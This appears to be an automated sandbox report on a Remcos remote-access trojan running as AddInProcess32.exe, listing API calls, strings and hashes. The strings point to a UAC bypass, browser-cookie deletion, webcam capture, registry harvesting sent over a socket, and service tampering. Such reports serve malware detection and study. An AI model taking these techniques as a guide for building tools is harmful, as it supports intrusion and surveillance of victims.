                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16_free
                                            • String ID: a/p$am/pm$h{D
                                            • API String ID: 2936374016-2303565833
                                            • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                            • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                            • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                            • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                            APIs
                                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                            • _free.LIBCMT ref: 00444E87
                                            • _free.LIBCMT ref: 00444E9E
                                            • _free.LIBCMT ref: 00444EBD
                                            • _free.LIBCMT ref: 00444ED8
                                            • _free.LIBCMT ref: 00444EEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$AllocateHeap
                                            • String ID: KED
                                            • API String ID: 3033488037-2133951994
                                            • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                            • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                            • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                            • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                            APIs
                                            • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Enum$InfoQueryValue
                                            • String ID: [regsplt]$xUG$TG
                                            • API String ID: 3554306468-1165877943
                                            • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                            • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                            • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                            • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                              • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                              • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEnumInfoOpenQuerysend
                                            • String ID: xUG$NG$NG$TG
                                            • API String ID: 3114080316-2811732169
                                            • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                            • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                            • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                            • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                            • __alloca_probe_16.LIBCMT ref: 00451231
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                            • __freea.LIBCMT ref: 0045129D
                                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                            • String ID: PkGNG
                                            • API String ID: 313313983-263838557
                                            • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                            • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                            • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                            • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                            APIs
                                              • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                              • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                              • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                              • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • _wcslen.LIBCMT ref: 0041B7F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                            • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                            • API String ID: 37874593-122982132
                                            • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                            • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                            • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                            • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                            APIs
                                              • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                              • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                              • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                            • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                            • API String ID: 1133728706-4073444585
                                            • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                            • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                            • Opcode Fuzzy Hash: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                            • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                            • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                            • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                            • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                            APIs
                                              • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                            • _free.LIBCMT ref: 00450FC8
                                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                            • _free.LIBCMT ref: 00450FD3
                                            • _free.LIBCMT ref: 00450FDE
                                            • _free.LIBCMT ref: 00451032
                                            • _free.LIBCMT ref: 0045103D
                                            • _free.LIBCMT ref: 00451048
                                            • _free.LIBCMT ref: 00451053
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                            • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                            • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                            • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                            • int.LIBCPMT ref: 004111BE
                                              • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                              • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                            • std::_Facet_Register.LIBCPMT ref: 004111FE
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                            • String ID: (mG
                                            • API String ID: 2536120697-4059303827
                                            • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                            • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                            • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                            • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                            APIs
                                              • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                              • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                              • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                              • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                            • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCurrentOpenProcessQueryValue
                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                            • API String ID: 1866151309-2070987746
                                            • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                            • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                            • Opcode Fuzzy Hash: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                            • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                            APIs
                                            • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                            • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                            • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                            • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                            • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                            APIs
                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040760B
                                              • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                              • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                            • CoUninitialize.OLE32 ref: 00407664
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InitializeObjectUninitialize_wcslen
                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                            • API String ID: 3851391207-3324213274
                                            • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                            • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                            • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                            • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                            APIs
                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                            • GetLastError.KERNEL32 ref: 0040BB22
                                            Strings
                                            • [Chrome Cookies not found], xrefs: 0040BB3C
                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                            • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                            • UserProfile, xrefs: 0040BAE8
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteErrorFileLast
                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                            • API String ID: 2018770650-304995407
                                            • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                            • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                            • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                            • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                            APIs
                                            • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                            • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Console$AllocOutputShowWindow
                                            • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                            • API String ID: 2425139147-2212855755
                                            • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                            • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                            • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                            • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                            • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$PkGNG$mscoree.dll
                                            • API String ID: 4061214504-213444651
                                            • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                            • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                            • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                            • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                            APIs
                                            • __allrem.LIBCMT ref: 0043ACE9
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                            • __allrem.LIBCMT ref: 0043AD1C
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                            • __allrem.LIBCMT ref: 0043AD51
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 1992179935-0
                                            • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                            • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                            • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                            • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                            APIs
                                            • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                              • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: H_prologSleep
                                            • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                            • API String ID: 3469354165-3054508432
                                            • Opcode ID: 157d80eb8e0f3678fafe4a2641bb4748a50a416a1c9fb699c11c746a5f7bd186
                                            • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                            • Opcode Fuzzy Hash: 157d80eb8e0f3678fafe4a2641bb4748a50a416a1c9fb699c11c746a5f7bd186
                                            • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                            APIs
                                              • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                            • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                            • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                              • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                              • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                              • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                            • String ID:
                                            • API String ID: 3950776272-0
                                            • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                            • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                            • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                            • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __cftoe
                                            • String ID:
                                            • API String ID: 4189289331-0
                                            • Opcode ID: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                            • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                            • Opcode Fuzzy Hash: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                            • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                            • String ID:
                                            • API String ID: 493672254-0
                                            • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                            • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                            • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                            • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __alldvrm$_strrchr
                                            • String ID: PkGNG
                                            • API String ID: 1036877536-263838557
                                            • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                            • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                            • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
